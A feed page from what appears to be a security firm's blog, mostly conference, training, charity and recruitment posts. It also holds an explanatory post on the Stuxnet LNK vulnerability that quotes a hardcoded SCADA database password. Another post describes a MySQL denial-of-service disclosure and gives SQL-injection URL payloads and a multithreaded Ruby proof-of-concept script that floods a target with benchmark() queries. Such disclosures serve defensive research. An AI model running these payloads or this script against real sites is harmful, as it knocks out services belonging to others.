Are you the publisher? Claim or contact us about this channel


Embed this content in your HTML

Search

Report adult content:

click to rate:

Account: (login)

More Channels


Channel Catalog


Channel Description:

Hackers for hire

(Page 1) | 2 | 3 | newer

    0 0

    After the notorious Adobe Flash 0-day that put the security community on alert at the end of May, it is now time for a new vulnerability to steal the thunder. A few days ago Microsoft has released a security advisory (2286198) warning his costumers about a critical security flaw. As detailed on the advisory, all maintained version of Windows Operating System are affected by the issue. Other areas confirm that other non-maintained versions of the operating system like Windows 2000 SP4 and Windows XP SP2 are still affected.

    This vulnerability, cataloged as CVE-2010-2568, lies on the Windows Shell component and occurs due the incorrectly way Windows parses shortcut references (files containing the .lnk extension). The advisory also details that it is possible to take advantage of this flaw in a malicious way to allow remote code execution.

    As reported on June 16th by the MPCC (Microsoft Malware Protection Center), a worm called Stuxnet that takes advantage of this vulnerability was already being monitored and is suspected to be spreading in the wild for at least a month, possibly longer. According to them, USB removable devices are the main instrument used in order to propagate it, but other infection mechanisms could also be used as Windows file shares and WebDav.

    According to Chester Wisniewski, the flaw occurs when shell32.dll tries to load control panel icons from applets. It is possible to create a specially crafted shortcut that points to a malicious file. That way, when the folder gets displayed (using Windows explorer for example) the LNK file will be charged to load and execute the malicious payload. Notice that the .lnk file just carries the exploitation/infection vector that leads the drivers to be executed.

    As pointed out by Chet on the same SophosLabs blog post, the analysis performed against an infected USB device containing the malicious code shows that the crafted shortcut file loads two drivers: mrxcls.sys and mrxnet.sys.

    These two drivers basically consist of a rootkit and once executed it installs a backdoor on the system, hides the presence of malicious files on the removable USB device and injects encrypted data blobs that seems to serve to the basic rootkit infrastructure.

    What has raised special attention is that these drivers were signed using a private key that belongs to Realtek Semiconductor Corp. a well known IC design and peripheral manufacturer company. This characteristic let the drivers to run unnoticed, without causing any warning to be exhibited to the user. How the attacker(s) manage to get their drivers signed by Realtek is still unknown.

    The MMPC teams have worked together with VeriSign and Realtek to revoke the certificate and issue a new one. Although, according F-secure it is still possible to use the certificate due the countersignature method of time stamping that allows signatures to be verified even after the certificate has expired or been revoked.

    Looking at the malware behavior, Frank Boldewin found some database queries that target the Siemens SIMATIC WinCC SCADA system, a computer system used to control and monitor critical infrastructure operations such the ones performed in power plants and large communication systems. According the Slashdot post the product uses a hardcoded username and password to access its database system (Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder).

    When you don't work for a company that operates critical infrastructure services you should not be worried about the malware it in the first place. But since a proof of concept code was released on exploit-db.com on June 18th, we can expect more payloads to emerge and ends up being triggered by the LNK vulnerability.

    Another important thing to mention is that a lot of questions are raised up these days concerning AutoRun and AutoPlay. As described on Seans post at F-Secure Weblog, the vulnerability could be exploited even if AutoRun and AutoPlay are disabled. However, as happened with the Conficker, these features could be used to trick a user and get the code executed, but it is definitely not required. In order to get the payload executed it is just necessary to display the folder content with the crafted LNK file inner in.

    In order to mitigate the issue until Microsoft properly releases a patch some workarounds were proposed as disabling the displaying of icons for shortcuts and disabling WebClient service, more details about how to perform such operations could be checked on the Microsoft Advisory (2286198). Other solution as proposed on the SophosLabs blog post involves the deploy of a GPO (Group Policy Object) disallowing the use of executable files that are not on the C: drive which I believe is the best way to mitigate the problem until the patch is released.

    More information about this malware could be verified on the Chet post including a video demonstrating the attack and in the PDF document wrote by Kupreev Oleg and Ulasen Sergey from VirusBlokAda, a Belorussian based company who first discovered and analyzed the exploit.

    0 0
  • 08/06/10--06:13: ISSA 2010
  • It’s been a while since I last posted on the blog; this is thankfully due to how busy we have been on this side.

    This week Telspace Systems presented at the prestigious ISSA 2010 conference held at the Sandton Convention Centre in Johannesburg, South Africa.

    Telspace Systems presented on Next Generation Botnets, Our talk should be available soon for download via their website at www.infosecsa.co.za . The talk was very well received and we have been invited to present at a few other universities in South Africa later this year. I can also highly recommend attending net year’s ISSA conference due to the level of expertise of the talks as well as the general atmosphere.

    Amongst the list of headline speakers was Craig Rosewarne. Craig presented a great talk on the trends of information security and whats in store for us in the future in South Africa. His talk took a broad view at South African history and compared it with information security as a whole. This is definitely a talk worth reviewing and I do recommend a revision of his slides.

    We have a lot of news coming up at Telspace Systems so I’ll definitely try updating you as much as possible in between the huge projects that we have at the moment.

    Be safe and keep well.

    0 0
  • 09/08/10--07:02: IIR Conference 2010
  • Telspace Systems have been invited to present their 'Next Generation Botnets' talk at The Institute for International Research's (IIR)IT Risk Management Conference on 10th October 2010 at the IIRConferenceCenter in Rosebank, South Africa.

    IIR’s IT Risk Management Conference will explore the challenges and current risks facing the IT Professional in the South African market and provide up-to-date techniques and experiences in assessing and averting risk. The expert speakers featured at this event come from a variety of sectors and are industry leaders in their respective fields, providing you with specialist and practical advice.”

    Some of the other presentations that we are looking forward to includes:

    ·Cloud Computing and its impact on IT Risk Management.

    ·An investigation into the use of social networking sites by employees and the effects on your IT Security.

    ·How to secure your organisation in the event of disaster.

    ·The security and risk implications of importing software.

    ·Implementing an IT Risk Management policy to safe guard against internal risks.


    Telspace Systems is also pleased to announce the launch of their new & updated website
    http://www.telspace.co.za


    0 0

    Tiago Ferreira, a senior security analyst at Telspace Systems, recently stumbled on a vulnerability in Mysql during a Penetration test for a client.

    Due to the lack of execution limit time (query timeout) for queries, it is possible to force the MySQL to process a certain query for a determined amount of time (hours/days). The processing time will depend on the hardware resources (cpu, memory) available at the server.

    The MySQL has a system variable that defines the maximum amount of connections that can be made simultaneously (max_user_connections) for the daemon. For instance, if this variable is configured to “max_user_connections=100, the MySQL will just allow that 100 simultaneous connections be processed. If a "101" connection is attempted, the daemon will answer with the message *Too many connections*, so that no other requirement be processed while the connections are active.

    The benchmark() function can be used to "hold" a determined connection for a certain time interval. For instance:


    mysql> select benchmark(500000,sha1('A'));
    +------------------------------+
    | benchmark(500000,sha1(0x65)) |
    +------------------------------+
    | 0 |
    +------------------------------+
    1 row in set (1.11 sec)

    When running the benchmark() function, as illustrated, it is possible to verify that the MySQL took about 1.11 seconds to process the query, which means it "held" the connection for a period of 1.11 seconds.

    If the value referring to the number of processing times of the benchmark() function is increased, the total processing time will, therefore, increase.

    mysql> select benchmark(500000000,sha1(0x65));
    +---------------------------------+
    | benchmark(500000000,sha1(0x65)) |
    +---------------------------------+
    | 0 |
    +---------------------------------+
    1 row in set (12 min 5.06 sec)

    The processing of the benchmark() function above took 12 minutes to be executed.

    As this function does not have limits for the amount of times necessary to process certain task, it is possible to increase this number to an extremely high value, so that one or more available connections be occupied for a long period of time.

    To cause a denial of service, multiple simultaneous connection queries are sent, to fill all the available slots in the MySQL(defined in max_user_connections) and maintain these connections busy with the benchmark() processing. This way the following connections will not be processed by the daemon.

    To force the MySQL into processing a query for a lot of hours/days, the following query can be sent:

    select benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))

    The native function ENCODE() takes about 4 times more to be processed than the sha1() function, and soon was chosen to "hold" the MySQL connections. During the tests made with the daemon, it was noticed that the cpu processing was kept at an average 98%, also denying new connections to the data base. To establish the normal functioning of the daemon it was necessary to restart the MySQL.

    The same kind of tests were made in the Microsoft SQL Server 2005, using the function *waitfor delay*, but it didn't appear to be vulnerable because the error message "Query timeout expired" was shown and the connection allowed, which means the MSSQL has a query time checking native algorithm.

    The impact caused by the exploration of this vulnerability is more critical when done remotely against Web applications vulnerable to a SQL Injection or Blind SQL Injection.

    For instance, an e-commerce site using the MySQL to storage data (products, prices, clients, etc.), can have it's services interrupted. The URL example below is responsible for seeking at the data base the product identified by the parameter id=100 and show them to the user.

    http://e-commerce.example.com/products.php?cat=2&id=100

    An attack scene for denial of service would be to send the following query several times.

    http://e-commerce.example.com/products.php?cat=2&id=100+select+benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))%23%23

    As a proof of concept a ruby script was developed to exploit this vulnerability, in the case of a Web application is vulnerable to SQL injection.

    #!/usr/bin/ruby
    #Telspace Systems - www.telspace.co.za - info[@]telspace.co.za

    require 'net/http'
    require 'uri'
    require 'optparse'

    # Command line options

    options = {}
    OptionParser.new do |opts|

    options[:url] = nil
    opts.on('-u', '--url',"Specify an URL vulnerable for MySQL Injection\n\n") do
    options[:url] = ARGV[0]
    end

    end.parse!

    # HTTP config

    if options[:url] != nil
    $base_url = options[:url].match(/http:\/\/(.*)\//).to_s
    $vuln_param = options[:url].scan(/\/\/[^\/]*(.*)/).to_s

    else
    puts "\tUse -u or --url to specify an URL vulnerable to MySQL Injection\n\n"
    exit

    end

    # Attack config

    threads = 500
    $payload1 = "+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"
    $payload2 = "'+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"

    # HTTP interface
    def build_http_request()
    begin
    uri = URI.parse($base_url)
    request = Net::HTTP.new(uri.host,uri.port)
    rescue Exception => error2
    store_logs = error2.inspect
    return request
    end
    end

    # Send multiples requests

    1.upto(threads){|i|
    threads = Thread.new do
    puts "Send request " + i.to_s
    request = build_http_request()
    request.request_get($vuln_param+$payload1)
    request.request_get($vuln_param+$payload2)
    end
    }

    0 0



    We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course at the end of November this year!

    We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed!

    Venue: The FNB Conference Centre – Sandton
    Costs: R7490.00 excluding VAT per person
    Dates: 25-26th November 2010

    Please see course details above or visit our website for more info: http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html

    Looking forward to seeing you there!

    0 0
  • 11/12/10--03:49: IIR Conference
  • The International Institute of Research's (IIR) IT Risk Management Conference was held this week in Rosebank on the 10,11 & 12th November 2010.

    Telspace Systems was invited to present their popular "Next Generation BotNet" talk which was very well received. Telspace is honoured for the opportunity to have spoken at the IIR conference and is looking forward to the next IT Risk Management Conference.

    The "Next Generation BotNet" is available for download on our site. http://www.telspace.co.za

    Telspace will also be running the highly recommended Bluetooth & Wireless Hacking Course at the end of November. For more information or any queries please email info@telspace.co.za

    0 0
  • 12/14/10--02:40: Happy Holidays!
  • To all our Valued Clients and Friends,

    The holiday season is a wonderful time for us to remember the friends and customers who help our business and make our jobs a pleasure all year long. Our business would not be where it is today without your continued and loyal support.

    We'd like to take this opportunity to thank you and send our best wishes to you and your families. May your New Year be filled with all the success and happiness that you deserve.

    This year has been an extremely busy year for us. Reflecting back on some of the highlights of the year shows us that we have been very fortunate to have spoken and trained at several well respected conferences including Hack in the Box Dubai 2010, IIR in Rosebank and ISSA in Sandton. We were also fortunate enough to have been a sponsor of the ITweb Security Summit 2010.

    In terms of giving back to the underprivileged, Telspace Systems got involved in Johnny Long’s Hackers for Charity, Nadia Van Der Merwe (FHM) Charity event in association with Lory Park Zoo and our entire Telspace Systems team helped needy children with the Santa's Shoebox Christmas charity drive – where we provided underprivileged children with the basic necessities and Christmas presents.

    From all of us at Telspace Systems, thank you for your loyal support, may you have a safe and restful holiday season.

    0 0




    We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course during March 2011!

    We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed! If you are a ISG member in South Africa, you will also qualify for a further 10% discount.

    Venue: The FNB Conference Centre – Sandton
    Costs: R7490.00 excluding VAT per person
    Dates: 16th & 17th March 2011

    Please see course details above or visit our website for more info: http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html

    Email us at info@telspace.co.za for bookings.

    Looking forward to seeing you there!

    0 0

    Telspace Systems is proud to announce that for a second year running, we will be a sponsor of the ITWeb Security Summit 2011.

    This conference will be held in Johannesburg, South Africa. This event is undoubtedly the largest security conference in South Africa and is attended by most major companies and government departments in the country.

    Get more information about the sponsors here:

    You can get more information about the security summit here:

    We hope to see you all there!

    0 0
  • 03/23/11--04:00: Training Feedback
  • Telspace Systems successfully completed another training session last week at the FNB training centre in Sandton, Johannesburg.

    We would like to thank all the candidates for coming through and working hard to get through the 2 day course, I trust you all found it very valuable.

    Please find the public feedback for our course as per below, the course was very well received by all candidates.

    Breakdown of Candidate responses:



    Overall Training Feedback:



    We look forward to presenting this course again during June 2011.

    See you there!

    0 0
  • 04/04/11--15:31: Takedowncon USA
  • It is with great pleasure that Telspace Systems presents training at the internationally recognised TakeDownCon, to be held in Dallas, USA.

    Telspace Systems will be holding a 2 day training session during May 2011.

    More information can be found at:

    http://www.takedowncon.com/?page_id=753



    In addition, if you sign up now you can get a FREE IPAD for attending our training session.

    We hope to see you there!

    0 0
  • 04/07/11--15:32: Web Application Hacking 101
  • Telspace Systems presents our Web Application Hacking 101 course during June 2011.




    Click here for more information.

    This course is aimed at developers, IT security staff, technology enthusiasts and web application specialists. Book multiple students and you will automatically qualify for a discount! We look forward to seeing you there!

    0 0

    Telspace Systems, a leading IT security solutions provider for both local and international markets, is expanding its services to include a security-focused skills recruitment division.

    The company has identified a growing shortage of specialised and highly-skilled individuals in the market, which is having a negative effect on local companies' level of security.

    Says Dino Covotsos, CEO of Telspace Systems: “The apparent lack of available security skills is becoming a growing concern for businesses. As cyber threats increase in sophistication, so should the systems that protect companies against them. We are seeing more and more that there are simply not enough highly-skilled individuals to ensure that these critical systems offer adequate protection.”

    Telspace Systems' new division aims to provide companies with candidates that can effectively address business security concerns based on skill level, experience and knowledge. “Limited skills often mean limited protection, and businesses need to understand the risks they face if they do not implement adequate protection,” says Covotsos.

    Telspace Systems will be at the ITWeb Security Summit 2011 on 10-11 May at the Sandton Convention Centre, where it will highlight its new division to delegates. Visitors will have a chance to interact with the team and learn more about the types of skills, the industry needs and what is currently available.

    This turnkey operation is the first of its kind, and given the company's industry knowledge, research and experience, it will be able to provide top talent and opportunities to many organisations and skilled security candidates respectively.
    “We are very excited about our new service offering and that we are able to bolster the level and quality of security for companies,” Covotsos concludes.

    Going forward, the company has plans to expand its IT security recruitment service internationally, and depending on market indications, begin offering other much-needed specialised IT skills as well.

    For any enquiries, please feel free to contact Telspace Systems' Recruitment Director Shaun Levy at (011) 875 4319 or email shaun[at]telspace.co.za

    0 0

    Telspace Systems, for the first time, exhibited at the ITWeb Security Summit 2011 in the form of the prominent stand 14.


    It was a successful two days, the hype amongst our stand proved that the industry is gearing towards something big and electrifying for the future of IT Security. We were excited to have met some new faces as well as some of the leading minds in the industry. We also had the opportunity to showcase our new Recruitment division, which had a great response and the spinoff is beginning to show.


    We would like to take the opportunity to thank all that attended and visited Telspace Systems, the responses were phenomenal and the stats look good. We are looking forward to meeting you all again very soon J



    Congratulations to Edith Ngoetjana from FNB for winning the draw for the Playstation 3, Enjoy it! I wouldn’t recommended joining the PSN though ;)

    Congratulations to Simphiwe Mayisela from T-Systems for winning the Web Application Hacking 101 training, valued at R7490.00 ex Vat. We hope that you find it to be very rewarding.


    0 0

    Telspace Systems was invited to present its Wireless & Bluetooth Hacking 101 training course at the first-ever TakeDownCon in Dallas recently.

    The conference, which took place between 14-19 May 2011, was the first of the EC-Council’s new technical IT security conference series.

    “We are privileged to have had the opportunity to train students at this new security conference series,” says Dino Covotsos, CEO of Telspace Systems.

    According to feedback reports, the training course was very well-received by the students, the majority of which were from the US government. “The course was fantastic . It was very fast-paced and in depth. It provided a great learning experience,” was one of the comments received by a student.

    Student feedback was as follows:



    The Wireless & Bluetooth Hacking 101 course ran over 2 days after which each student went home with a brand-new iPad 2 device.

    Says Covotsos, “The training was truly exceptional, and we got a large amount of new business interest and networking contacts as a result. It was an honour for Telspace to be recognised alongside international IT training providers.”

    Other types of training available included ethical hacking, penetration testing, digital forensics and application security.

    Also at TakeDownCon, Rodrigo Rubira Branco, The Director of Vulnerability Malware Research at Qualys and founder of the Dissect || PE project, did a presentation on automated malware analysis, which is currently considered to be the top trend in the security industry. We recommend you check out his presentation and slide deck at the TakeDownCon website.

    SpeedHack @ TakeDownCon, a brand new hacking competition designed just for registered TakeDownCon attendees, took place on the evening of 17 May. Watch out for some new exciting developments with hacking competitions worldwide.

    Coming up

    Telspace Systems has been invited to offer its Wireless & Bluetooth Hacking 101 training course at two other associate conferences, namely Hacker Halted - Miami at the end of October 2011, and TakeDownCon Las Vegas in December 2011.

    “It bodes well not only for Telspace Systems, but for South Africa if we are recognised at these types of international conferences,” says Covotsos. “International trends are usually ahead of local ones – and it helps us and our clients to travel abroad like this so that we can bring back home the knowledge we gained, and share it with the local industry.”

    TakeDownCon website: http://www.takedowncon.com

    0 0

    In this ever-changing industry comes a passion and desire to learn. A vast majority of companies are looking for talented professionals to fill a void within their organisation, in order to stay abreast of the swift changes experienced daily.

    The difficulty experienced in filling the gap comes down to three basic elements – timing, shortage of skills/experience and awareness. Many employees in various positions have basically picked up the skills very early on and grown within the industry from the beginning of their careers.
    The trend we have identified and followed, illustrates hard evidence of an active market and a lack of awareness.

    We are here to fill that gap.

    We have various IT Security related vacancies available on a national scale with incredible clients, a few of which are as follows:



    Should you be interested to see what is available or you are possibly looking for a fresh challenge, please send us your CV or contact us via email at shaun[@]telspace.co.za

    Should you be looking for top notch talent for your business, we have an extensive database of able and willing candidates to fit your requirements.

    0 0
  • 11/17/11--05:09: Hacker Halted - Miami 2011
  •  After a successful Wireless and Bluetooth Hacking 101 course presented at TakeDownCon in Dallas(USA) earlier this year, Telspace Systems was invited to present and train students at the well known Hacker Halted in Miami, during October 2011.


    Our training class was very well attended by many Military(Defence) and Banking clients. We recieved fantastic reviews of our class and after generating statistics, we are extremely happy with the outcome of maintaining high quality training worldwide.


    Statistics are as follows:







    Hacker Halted in Miami was an extremely well attended conference which was well organised. The conference itself featured many international "superstars" from the information security arena and completely exceeded our expectations(which were already high because of TakeDownCon).


    A big thank you to the entire crew that organised everything for us in Miami(Joyce and Leo, thanks!).

    We look forward to seeing all our friends(and now family) at Hacker Halted next year!

    0 0
  • 11/29/11--04:33: Santa Shoe Box - Feedback

  • The Santa Shoe Box drive is over and we are pleased to announce it was an incredible success as approximately 70 489 Boxes were collected.



    Year on year we are pleased to be seeing an increase in the number of participants, it’s great to see how many people are willing to assist a charitable cause such as this.




    We would like to thank each and every person who contributed to this worthy cause and made it a Christmas to remember for tens of thousands of underprivileged kids.




    We are looking forward to being part of a bigger target next year , as well as seeing an exponential growth in the number of participants.

    0 0

    It's the very first day of 2012, and we want to take this opportunity to wish you all a very happy New Year.
    2011 was by far our best year ever! We managed to cram in so many amazing opportunities of presenting and training internationally, including places such as Dallas, Miami, New York and Rwanda! We really wouldn't' have been able to do any of this without the support of a great number of people.
    I want to thank our entire team for all their hard work during 2011, you are the people that make Telspace Systems run day to day and assure our clients of world class services. Hardly anyone actually see's the amount of real hours you put in and I would like to personally say thank you for going above and beyond.
    Most of all I want to thank our loyal customers and friends who are the real reason that we are still in business and are able to produce such interesting work. Thank you for everything!
    We've really enjoyed a huge amount of growth and support during 2011 and I am positive that 2012 will be a bumper year for us. We have huge plans for 2012, just watch this space!
    On behalf of everyone at Telspace Systems I would like to wish you all a very happy New Year! We look forward to being of service to you.

    0 0



    Telspace Systems is proud to announce event sponsorship of hackZA 2012, the information security conference to be held in Johannesburg, South Africa.

    The purpose of the hackZA 2012 conference is to provide a platform and playground where international speakers are brought to South Africa to present their ground breaking research with no boundaries or vendor intervention.


    Speakers are brought out to Johannesburg to present their training and talk topics to educate an audience which would not be able to attend other international conferences due to finance restrictions and so forth. hackZA is a technical conference where local residents can engage with speakers, learn from them and be entertained.


    Confirmed international speakers and topics are as follows:


    * Julio Auto (Brazil) Playing with x86 code normalization

    * Joe McCray (USA) - You Spent All That Money And You Still Got Owned???
    * Jayson E. Street (USA) - Steal Everything, Kill Everyone, Cause Total Financial Ruin!
    * Hemil Shah (India and SA) - Penetrating Mobile Applications - Attacks & Exploits

    The conference will be held in Johannesburg, South Africa during April 2012. The dates are the 2nd and 3rd April 2012 for technical training and 4th April 2012 for a single track highly technical conference.


    International training courses are as follows:


    * Hemil Shah – Web Application Security – Threats and Countermeasures

    * Joe McCray – Advanced Penetration testing
    * Dino Covotsos – Hacking Wireless and Bluetooth 101

    If you would like to attend please register on www.hackza.com .

(Page 1) | 2 | 3 | newer